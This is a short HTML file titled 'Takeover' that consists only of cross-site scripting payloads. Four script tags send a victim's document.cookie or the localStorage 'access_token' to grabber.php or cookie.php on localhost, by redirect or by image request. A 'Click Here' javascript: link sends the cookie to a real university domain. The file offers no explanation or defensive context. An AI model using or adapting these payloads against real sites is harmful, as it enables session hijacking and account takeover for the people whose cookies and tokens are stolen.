<h1>Takeover</h1>

<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
<script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>
<script>new Image().src="http://localhost/cookie.php?c="+document.cookie;</script>
<script>new Image().src="http://localhost/cookie.php?c="+localStorage.getItem('access_token');</script>
<a href="javascript:document.location='https://globalcareers.monash.edu?cookie=' + encodeURIComponent(document.cookie)">Click Here</a>
